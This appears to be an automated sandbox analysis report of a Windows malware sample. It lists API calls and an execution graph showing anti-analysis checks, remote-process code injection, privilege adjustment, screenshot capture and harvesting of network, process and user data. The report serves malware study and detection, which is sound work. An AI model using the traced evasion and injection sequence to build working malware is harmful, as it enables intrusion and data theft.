                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76A8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:85.7%
                                                                                                                                                                                                              Signature Coverage:18.5%
                                                                                                                                                                                                              Total number of Nodes:1100
                                                                                                                                                                                                              Total number of Limit Nodes:25
                                                                                                                                                                                                              execution_graph 82505 402d30 LoadLibraryA GetModuleFileNameA 82577 403a20 RegOpenKeyExA 82505->82577 82508 402d64 ExitProcess 82509 402d6c 82592 4021d0 CreateFileA 82509->82592 82514 402da1 82603 402360 CreateFileA 82514->82603 82515 402d89 GetTickCount PostMessageA 82515->82514 82524 402dc1 82668 401ea0 40 API calls 82524->82668 82525 402de3 IsUserAnAdmin GetModuleHandleA 82527 402e1c 82525->82527 82528 402dfd GetProcAddress 82525->82528 82530 402e22 82527->82530 82531 402e6e 82527->82531 82528->82527 82529 402e0f GetCurrentProcess 82528->82529 82529->82527 82535 402e26 StrStrIA 82530->82535 82536 402e3c 82530->82536 82533 402e76 StrStrIA 82531->82533 82534 402efd 82531->82534 82532 402dc6 82537 402dd2 82532->82537 82538 402dca ExitProcess 82532->82538 82539 402ea1 82533->82539 82540 402e8c 82533->82540 82542 402930 9 API calls 82534->82542 82535->82536 82541 402e5f 82535->82541 82629 402930 RegCreateKeyExA 82536->82629 82669 403560 71 API calls 82537->82669 82673 402a70 88 API calls 82539->82673 82545 402930 9 API calls 82540->82545 82670 402a70 88 API calls 82541->82670 82548 402f08 GlobalFindAtomA 82542->82548 82551 402e97 82545->82551 82552 402f58 ExitProcess 82548->82552 82553 402f18 GlobalAddAtomA IsUserAnAdmin 82548->82553 82550 402dd7 82550->82525 82556 402ddb ExitProcess 82550->82556 82672 4028d0 43 API calls 82551->82672 82562 402f39 IsUserAnAdmin 82553->82562 82563 402f29 82553->82563 82554 402ea6 GlobalFindAtomA 82559 402ef6 82554->82559 82560 402eb6 GlobalAddAtomA IsUserAnAdmin 82554->82560 82557 402e64 82671 4012b0 9 API calls 82557->82671 82675 4012b0 9 API calls 82559->82675 82567 402ed7 IsUserAnAdmin 82560->82567 82568 402ec7 82560->82568 82569 402f44 82562->82569 82563->82562 82565 402e69 82565->82552 82570 402ee2 82567->82570 82568->82567 82676 4015a0 7 API calls 82569->82676 82674 4015a0 7 API calls 82570->82674 82572 402f4f 82572->82552 82575 401670 32 API calls 82572->82575 82574 402eed 82574->82559 82576 401670 32 API calls 82574->82576 82575->82552 82576->82559 82578 403a6a RegQueryValueExA 82577->82578 82579 403acd GetUserNameA CharUpperA strstr 82577->82579 82582 403a9b RegCloseKey 82578->82582 82583 403a8f RegCloseKey 82578->82583 82580 402d60 82579->82580 82581 403b0b strstr 82579->82581 82580->82508 82580->82509 82581->82580 82584 403b24 strstr 82581->82584 82582->82579 82586 403aae 82582->82586 82583->82579 82584->82580 82585 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 82584->82585 82585->82580 82587 403b7d 82585->82587 82586->82579 82586->82580 82587->82580 82588 403b99 GetModuleFileNameA StrStrIA 82587->82588 82588->82580 82589 403bc5 StrStrIA 82588->82589 82589->82580 82590 403bd7 StrStrIA 82589->82590 82590->82580 82591 403be9 82590->82591 82591->82580 82593 402350 82592->82593 82594 402320 DeviceIoControl CloseHandle 82592->82594 82595 4020e0 memset SHGetFolderPathA 82593->82595 82594->82593 82596 4021a7 82595->82596 82597 40213e PathAppendA SetCurrentDirectoryA 82595->82597 82598 4021b2 FindWindowA 82596->82598 82599 4021ab FreeLibrary 82596->82599 82597->82596 82600 402161 LoadLibraryA 82597->82600 82598->82514 82598->82515 82599->82598 82600->82596 82601 402175 GetProcAddress 82600->82601 82601->82596 82602 402185 82601->82602 82602->82596 82604 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 82603->82604 82605 402444 82603->82605 82604->82605 82606 402450 SHGetFolderPathA 82605->82606 82607 402535 82606->82607 82608 402477 82606->82608 82610 402540 SHGetFolderPathA 82607->82610 82608->82608 82609 4024ec MoveFileA 82608->82609 82609->82607 82611 40266f 82610->82611 82612 40256b CreateFileA 82610->82612 82615 402680 CoInitializeEx 82611->82615 82612->82611 82614 4025d1 11 API calls 82612->82614 82614->82611 82616 4026ae 82615->82616 82617 4026bf GetModuleFileNameW SysAllocString 82615->82617 82616->82617 82619 4028c4 IsUserAnAdmin 82616->82619 82618 4026ed SysAllocString 82617->82618 82624 402866 82617->82624 82620 402853 SysFreeString 82618->82620 82621 4026fe CoCreateInstance 82618->82621 82619->82524 82619->82525 82622 402863 SysFreeString 82620->82622 82620->82624 82623 402827 82621->82623 82626 402725 82621->82626 82622->82624 82623->82620 82624->82619 82625 4028be CoUninitialize 82624->82625 82625->82619 82626->82620 82626->82623 82627 4027b3 CoCreateInstance 82626->82627 82628 4027d5 82627->82628 82628->82623 82630 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 82629->82630 82631 4029fd RegCreateKeyExA 82629->82631 82632 4029e0 82630->82632 82631->82632 82633 402a44 82631->82633 82632->82632 82636 402a3e RegSetValueExA 82632->82636 82634 402a4c RegFlushKey RegCloseKey 82633->82634 82635 402a5d GetCurrentProcessId 82633->82635 82634->82635 82637 401670 82635->82637 82636->82633 82638 4018d3 Sleep 82637->82638 82640 401686 82637->82640 82638->82552 82641 4016a5 82640->82641 82642 40169b Sleep 82640->82642 82677 401cf0 memset CreateToolhelp32Snapshot 82640->82677 82643 401cf0 11 API calls 82641->82643 82642->82640 82642->82641 82644 4016ac 82643->82644 82644->82638 82645 4016b4 OpenProcess 82644->82645 82645->82638 82646 4016cf GetModuleHandleA 82645->82646 82647 401706 82646->82647 82648 4016eb GetProcAddress 82646->82648 82650 40170c GetModuleHandleA 82647->82650 82651 40173f VirtualAllocEx 82647->82651 82648->82647 82649 4016f9 GetCurrentProcess 82648->82649 82649->82647 82654 401722 GetProcAddress 82650->82654 82655 40172e 82650->82655 82652 4018b0 GetHandleInformation 82651->82652 82653 401782 WriteProcessMemory 82651->82653 82652->82638 82658 4018c6 82652->82658 82656 4017ae 82653->82656 82657 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 82653->82657 82654->82655 82655->82651 82655->82652 82659 4017b1 VirtualAlloc 82656->82659 82666 401819 82656->82666 82660 401862 GetHandleInformation 82657->82660 82661 40188e RtlCreateUserThread 82657->82661 82658->82638 82662 4018cc CloseHandle 82658->82662 82659->82656 82663 4017c9 memcpy WriteProcessMemory VirtualFree 82659->82663 82664 401885 82660->82664 82665 401878 82660->82665 82661->82652 82662->82638 82663->82656 82664->82652 82665->82664 82667 40187e CloseHandle 82665->82667 82666->82657 82667->82664 82668->82532 82669->82550 82670->82557 82671->82565 82672->82565 82673->82554 82674->82574 82675->82565 82676->82572 82678 401d30 GetLastError 82677->82678 82679 401d88 Module32First 82677->82679 82680 401deb 82678->82680 82681 401d3f SwitchToThread CreateToolhelp32Snapshot 82678->82681 82682 401da4 82679->82682 82683 401d55 82679->82683 82680->82640 82681->82680 82681->82683 82684 401db0 StrStrIA 82682->82684 82685 401d63 GetHandleInformation 82683->82685 82686 401d7f 82683->82686 82687 401dc2 StrStrIA 82684->82687 82688 401dce Module32Next 82684->82688 82685->82686 82689 401d72 82685->82689 82686->82640 82687->82683 82687->82688 82688->82683 82688->82684 82689->82686 82690 401d78 CloseHandle 82689->82690 82690->82686 82691 2643a20 82692 2644078 82691->82692 82696 2643a45 82691->82696 82693 2643aff 82693->82692 82752 2643830 RegOpenKeyExA 82693->82752 82694 2643aa8 VirtualQuery 82694->82696 82696->82692 82696->82693 82696->82694 82698 2665460 VirtualQuery 82696->82698 82698->82696 82701 2643b46 SymSetOptions GetCurrentProcess SymInitialize 82702 2643b68 GetCurrentProcess 82701->82702 82704 2643ba3 82701->82704 82763 2643910 82702->82763 82704->82704 82772 2665460 VirtualQuery 82704->82772 82706 2643bc8 82773 2665460 VirtualQuery 82706->82773 82708 2643bdb GetLastError _snprintf 82774 2665460 VirtualQuery 82708->82774 82710 2643c55 82711 2643c71 82710->82711 82922 2665460 VirtualQuery 82710->82922 82712 2643cc8 GetCurrentThread ZwQueryInformationThread 82711->82712 82718 2643d2d 82711->82718 82714 2643ce5 GetCurrentProcess 82712->82714 82712->82718 82719 2643910 6 API calls 82714->82719 82715 2643c65 82923 2665460 VirtualQuery 82715->82923 82720 2643d93 GetCurrentProcess 82718->82720 82722 2643dae 82718->82722 82719->82718 82723 2643910 6 API calls 82720->82723 82721 2644067 VirtualFree 82721->82692 82722->82721 82724 2643de2 PathAddBackslashA 82722->82724 82723->82718 82725 2643df6 82724->82725 82725->82725 82726 2643e10 PathAddBackslashA 82725->82726 82775 2643080 82726->82775 82732 2643e60 82732->82732 82733 2643e78 GetDateFormatA GetTimeFormatA _snprintf 82732->82733 82734 2643ef6 PathAddBackslashA 82733->82734 82736 2643f40 82734->82736 82785 2644b00 CreateFileA 82736->82785 82740 2643fc0 82841 26654a0 GetDesktopWindow GetWindowDC 82740->82841 82742 2644015 82866 26472e0 CreateFileA 82742->82866 82748 2644046 PathAddBackslashA 82879 26539d0 EnterCriticalSection GetCurrentDirectoryA _snprintf SetCurrentDirectoryA 82748->82879 82750 264405c 82924 26479c0 SetFileAttributesA DeleteFileA 82750->82924 82753 264386e RegQueryValueExA 82752->82753 82754 264388b 82752->82754 82753->82754 82755 2643892 RegCloseKey 82754->82755 82756 2643899 82754->82756 82755->82756 82756->82692 82757 26438a0 RegOpenKeyExA 82756->82757 82758 26438f0 82757->82758 82759 26438ca RegSetValueExA 82757->82759 82761 26438f7 RegCloseKey 82758->82761 82762 26438fe VirtualAlloc 82758->82762 82759->82758 82760 26438e6 RegFlushKey 82759->82760 82760->82758 82761->82762 82762->82692 82762->82701 82765 2643924 82763->82765 82764 2643a0a 82764->82704 82765->82764 82766 2643949 SymGetModuleBase 82765->82766 82767 26439f2 _snprintf 82766->82767 82768 2643973 SymGetModuleInfo 82766->82768 82767->82764 82768->82767 82769 2643986 SymGetSymFromAddr 82768->82769 82770 26439a0 _snprintf 82769->82770 82771 26439ce _snprintf 82769->82771 82770->82704 82771->82704 82772->82706 82773->82708 82774->82710 82776 26430d9 82775->82776 82777 264308f 82775->82777 82779 2647980 82776->82779 82925 2647680 82777->82925 82780 2647984 CreateDirectoryA 82779->82780 82781 2643e3a PathAddBackslashA 82779->82781 82780->82781 82782 2647991 GetLastError IsUserAnAdmin 82780->82782 82781->82732 82783 26479a4 PathMakeSystemFolderA 82782->82783 82784 26479ab SetLastError 82782->82784 82783->82784 82784->82781 82786 2644c48 82785->82786 82787 2643f9d PathAddBackslashA 82785->82787 82948 26659d0 82786->82948 82787->82740 82790 2644d80 82790->82790 82791 2644d95 SetFilePointer LockFile WriteFile UnlockFile 82790->82791 82792 2644dd8 9 API calls 82790->82792 82791->82792 82793 2644e76 82792->82793 82793->82793 82794 2644ece 9 API calls 82793->82794 82795 2644e8b SetFilePointer LockFile WriteFile UnlockFile 82793->82795 82796 2644f72 82794->82796 82795->82794 82796->82796 82797 2644f87 SetFilePointer LockFile WriteFile UnlockFile 82796->82797 82798 2644fca 6 API calls 82796->82798 82797->82798 82799 2645030 82798->82799 82799->82799 82800 2645085 SetFilePointer LockFile WriteFile UnlockFile 82799->82800 82801 26450d0 82800->82801 82801->82801 82802 26450e5 SetFilePointer LockFile WriteFile UnlockFile 82801->82802 82803 2645128 13 API calls 82801->82803 82802->82803 82804 26451f3 82803->82804 82804->82804 82805 2645208 SetFilePointer LockFile WriteFile UnlockFile 82804->82805 82806 264524b 9 API calls 82804->82806 82805->82806 82807 26452f8 82806->82807 82807->82807 82808 2645350 9 API calls 82807->82808 82809 264530d SetFilePointer LockFile WriteFile UnlockFile 82807->82809 82810 2645400 82808->82810 82809->82808 82810->82810 82811 2645415 SetFilePointer LockFile WriteFile UnlockFile 82810->82811 82812 2645458 10 API calls 82810->82812 82811->82812 82813 2645556 82812->82813 82813->82813 82814 26455ae 8 API calls 82813->82814 82815 264556b SetFilePointer LockFile WriteFile UnlockFile 82813->82815 82957 2644100 GetTickCount _snprintf 82814->82957 82815->82814 82817 2645637 82958 2644100 GetTickCount _snprintf 82817->82958 82819 2645651 82820 26456a5 9 API calls 82819->82820 82821 2645665 SetFilePointer LockFile WriteFile UnlockFile 82819->82821 82822 2645744 82820->82822 82821->82820 82822->82822 82823 264579c 9 API calls 82822->82823 82824 2645759 SetFilePointer LockFile WriteFile UnlockFile 82822->82824 82825 264582f IsUserAnAdmin 82823->82825 82824->82823 82827 2645854 82825->82827 82828 26458ae SetFilePointer LockFile WriteFile UnlockFile 82827->82828 82829 264586e SetFilePointer LockFile WriteFile UnlockFile 82827->82829 82959 2644900 RegOpenKeyExA 82828->82959 82829->82828 82833 26458f7 83004 26444d0 memset CreateToolhelp32Snapshot 82833->83004 82835 26458fd 83022 2644710 82835->83022 82837 2645903 82837->82787 82838 264590e GetHandleInformation 82837->82838 82838->82787 82839 264591d 82838->82839 82839->82787 82840 2645923 CloseHandle 82839->82840 82840->82787 82842 26654c7 CreateCompatibleDC 82841->82842 82843 26655da 82841->82843 82842->82843 82844 26654d8 7 API calls 82842->82844 82843->82742 82844->82843 82845 2665568 GetProcessHeap HeapAlloc 82844->82845 82845->82843 82846 2665582 memset GetDIBits 82845->82846 83043 2654170 82846->83043 82849 26655e5 GetDIBits 82851 26472e0 13 API calls 82849->82851 82850 26655d3 82852 26541b0 4 API calls 82850->82852 82853 266561d 82851->82853 82852->82843 82854 2647620 4 API calls 82853->82854 82865 266564e 82853->82865 82856 2665632 82854->82856 82855 26541b0 4 API calls 82857 266565c 82855->82857 82858 2647620 4 API calls 82856->82858 82859 26541b0 4 API calls 82857->82859 82861 266563d 82858->82861 82860 2665664 ReleaseDC 82859->82860 82860->82742 82862 2647620 4 API calls 82861->82862 82863 2665649 82862->82863 82864 2647310 2 API calls 82863->82864 82864->82865 82865->82855 82867 2647301 82866->82867 82868 2644020 82866->82868 82869 26659d0 12 API calls 82867->82869 82868->82721 82870 2647620 82868->82870 82869->82868 82871 2644041 82870->82871 82872 264762e 82870->82872 82874 2647310 82871->82874 82872->82871 82873 2647632 SetFilePointer LockFile WriteFile UnlockFile 82872->82873 82873->82871 82875 264733f 82874->82875 82876 264731f GetHandleInformation 82874->82876 82875->82748 82876->82875 82877 264732e 82876->82877 82877->82875 82878 2647334 CloseHandle 82877->82878 82878->82748 82880 265406f SetCurrentDirectoryA PathFileExistsA 82879->82880 82889 2653a39 82879->82889 82881 265408d SetFileAttributesA DeleteFileA 82880->82881 82882 26540a9 82880->82882 82881->82882 82883 26540c1 GetProcessHeap HeapValidate 82882->82883 82884 26540db 82882->82884 82883->82884 82885 26540d0 GetProcessHeap HeapFree 82883->82885 82886 26540e1 GetProcessHeap HeapValidate 82884->82886 82887 26540fb LeaveCriticalSection 82884->82887 82885->82884 82886->82887 82888 26540f0 GetProcessHeap HeapFree 82886->82888 82887->82750 82888->82887 82890 2653a9c 82889->82890 82891 2653aa7 82889->82891 83108 2645d30 60 API calls 82890->83108 82891->82891 82893 2653af3 PathAddBackslashA 82891->82893 82900 2653bd3 82891->82900 82894 2653b10 82893->82894 82894->82894 82895 2653b18 SHGetFolderPathA PathAddBackslashA 82894->82895 82898 2653b62 82895->82898 82896 2653c85 GetTickCount _snprintf VirtualAlloc 82896->82880 82897 2653cc9 lstrcpynA 82896->82897 83047 2669780 GetProcessHeap HeapAlloc 82897->83047 82898->82898 82904 2653b7c CopyFileA 82898->82904 82900->82896 82902 2653c69 SetFileAttributesA DeleteFileA 82900->82902 82901 2653ce8 82903 2653cfd VirtualFree 82901->82903 83057 2669910 82901->83057 82902->82896 82907 2647680 26 API calls 82903->82907 82906 2653bb0 82904->82906 82906->82906 82910 2653bc3 PathAddBackslashA 82906->82910 82909 2653d17 SetFileAttributesA RemoveDirectoryA 82907->82909 83081 26478e0 82909->83081 82910->82900 82914 2653d62 GetProcessHeap HeapAlloc 82915 2653d7e memset 82914->82915 82916 2653d8a 82914->82916 82915->82916 82916->82880 82918 2653ffa Sleep 82916->82918 82919 2654007 82916->82919 83090 2653800 memset memset GetTempPathA GetTempFileNameA 82916->83090 82918->82916 82918->82919 82919->82880 82920 265405d 82919->82920 82920->82880 83109 2643500 6 API calls 82920->83109 82922->82715 82923->82711 82924->82721 82926 26478d7 82925->82926 82927 264769a 82925->82927 82926->82776 82927->82926 82928 26476b2 GetProcessHeap HeapAlloc 82927->82928 82928->82926 82929 26476d6 memset lstrcpynA 82928->82929 82930 26476f2 82929->82930 82930->82930 82931 26476fa FindFirstFileA 82930->82931 82931->82926 82936 2647726 82931->82936 82932 26478a7 FindNextFileA 82933 26478bb FindClose 82932->82933 82932->82936 82944 26541b0 82933->82944 82936->82926 82936->82932 82937 26477d5 GetProcessHeap HeapAlloc 82936->82937 82939 2647855 SetFileAttributesA SetFileAttributesA DeleteFileA 82936->82939 82940 2647680 4 API calls 82936->82940 82942 264787a GetProcessHeap HeapValidate 82936->82942 82937->82926 82938 26477f5 memset lstrcpynA PathAddBackslashA 82937->82938 82938->82936 82941 2647870 MoveFileExA 82939->82941 82939->82942 82940->82936 82941->82942 82942->82936 82943 2647890 GetProcessHeap HeapFree 82942->82943 82943->82936 82945 26541b4 GetProcessHeap HeapValidate 82944->82945 82946 26478c7 SetFileAttributesA RemoveDirectoryA 82944->82946 82945->82946 82947 26541cb GetProcessHeap RtlFreeHeap 82945->82947 82946->82926 82947->82946 83035 2665930 GetCurrentThread OpenThreadToken 82948->83035 82951 26659e2 ConvertStringSecurityDescriptorToSecurityDescriptorW 82952 2644c50 17 API calls 82951->82952 82953 26659f8 GetSecurityDescriptorSacl 82951->82953 82952->82790 82954 2665a15 SetNamedSecurityInfoA 82953->82954 82955 2665a33 LocalFree 82953->82955 82954->82955 82956 2665a30 82954->82956 82955->82952 82956->82955 82957->82817 82958->82819 82960 2644af2 82959->82960 82961 2644933 _snprintf 82959->82961 82970 2644180 GetProcessHeap HeapAlloc 82960->82970 82962 2644ae8 RegCloseKey 82961->82962 82967 264495e 82961->82967 82962->82960 82963 2644966 RegQueryValueExA 82964 2644ae6 82963->82964 82963->82967 82964->82962 82965 26449dd SetFilePointer LockFile WriteFile UnlockFile 82965->82967 82966 264499a SetFilePointer LockFile WriteFile UnlockFile 82966->82965 82967->82963 82967->82965 82967->82966 82967->82967 82968 2644a3c SetFilePointer LockFile WriteFile UnlockFile 82967->82968 82969 2644a7a SetFilePointer LockFile WriteFile UnlockFile _snprintf 82967->82969 82968->82969 82969->82963 82969->82964 82971 26441bc 82970->82971 82972 26441ac memset 82970->82972 82973 26444c5 82971->82973 82974 264421d GetTcpTable 82971->82974 82972->82971 82973->82833 82975 2644290 82974->82975 82976 264422f GetProcessHeap HeapValidate 82974->82976 82977 2644294 GetProcessHeap HeapValidate 82975->82977 82978 26442bd 82975->82978 82979 264423f GetProcessHeap HeapFree 82976->82979 82980 264424b 82976->82980 82977->82973 82983 26442a8 GetProcessHeap HeapFree 82977->82983 82984 2644370 82978->82984 82985 26442d1 GetProcessHeap HeapAlloc 82978->82985 82979->82980 82981 2644254 GetProcessHeap HeapAlloc 82980->82981 82982 2644278 82980->82982 82981->82982 82986 264426c memset 82981->82986 82982->82973 82987 2644283 GetTcpTable 82982->82987 82983->82833 82988 26541b0 4 API calls 82984->82988 82985->82984 82989 26442f0 memset 82985->82989 82986->82982 82987->82975 82990 2644377 82988->82990 82991 2644305 82989->82991 82990->82833 82991->82991 82993 264442a 82991->82993 82999 264431f 82991->82999 82992 2644090 GetProcessHeap HeapAlloc _snprintf 82992->82999 82993->82993 82994 2644464 SetFilePointer LockFile WriteFile UnlockFile 82993->82994 82995 26444a3 GetProcessHeap HeapValidate 82993->82995 82994->82995 82995->82973 82996 26444b9 GetProcessHeap HeapFree 82995->82996 82996->82973 82997 2644344 GetProcessHeap HeapValidate 82998 264435b GetProcessHeap HeapFree 82997->82998 82997->82999 82998->82999 82999->82992 82999->82993 82999->82997 82999->82999 83000 264438c htons htons _snprintf GetProcessHeap HeapValidate 82999->83000 83001 26443e7 GetProcessHeap HeapFree 83000->83001 83002 26443f3 GetProcessHeap HeapValidate 83000->83002 83001->83002 83002->82999 83003 2644406 GetProcessHeap HeapFree 83002->83003 83003->82999 83005 26446e6 83004->83005 83006 2644523 Process32First 83004->83006 83005->82835 83007 2644576 83006->83007 83008 264453b 83006->83008 83007->83005 83012 2644597 GetProcessHeap HeapAlloc 83007->83012 83008->83005 83009 2644547 GetHandleInformation 83008->83009 83009->83005 83010 264455b 83009->83010 83010->83005 83011 2644566 CloseHandle 83010->83011 83011->82835 83012->83005 83013 26445b7 memset 83012->83013 83016 26445d0 83013->83016 83014 26445e0 OpenProcess 83015 26445f6 GetModuleFileNameExA 83014->83015 83014->83016 83015->83016 83016->83014 83016->83016 83017 2644657 _snprintf Process32Next 83016->83017 83017->83014 83018 2644689 83017->83018 83018->83018 83019 2647620 4 API calls 83018->83019 83020 26446c4 GetProcessHeap HeapValidate 83019->83020 83020->83005 83021 26446da GetProcessHeap HeapFree 83020->83021 83021->83005 83026 26448e0 83022->83026 83032 2644741 83022->83032 83023 2644743 NetQueryDisplayInformation 83023->83032 83024 2644799 GetProcessHeap HeapAlloc 83027 26447b8 memset 83024->83027 83024->83032 83025 2644857 83025->83026 83029 26448be GetProcessHeap HeapValidate 83025->83029 83030 264487a SetFilePointer LockFile WriteFile UnlockFile 83025->83030 83026->82837 83027->83032 83028 26448e9 NetApiBufferFree 83028->82837 83029->83026 83031 26448d4 GetProcessHeap HeapFree 83029->83031 83030->83029 83031->83026 83032->83023 83032->83024 83032->83025 83032->83028 83032->83032 83033 264482a NetApiBufferFree 83032->83033 83034 26447fc _snprintf 83032->83034 83033->83023 83033->83025 83034->83032 83036 2665951 GetCurrentProcess OpenProcessToken 83035->83036 83037 2665968 LookupPrivilegeValueA 83035->83037 83036->83037 83038 26659bc 83036->83038 83039 26659b2 CloseHandle 83037->83039 83040 266598b AdjustTokenPrivileges 83037->83040 83038->82951 83038->82952 83039->83038 83040->83039 83041 26659a5 GetLastError 83040->83041 83041->83039 83042 26659af 83041->83042 83042->83039 83044 26541a2 83043->83044 83045 2654176 GetProcessHeap RtlAllocateHeap 83043->83045 83044->82849 83044->82850 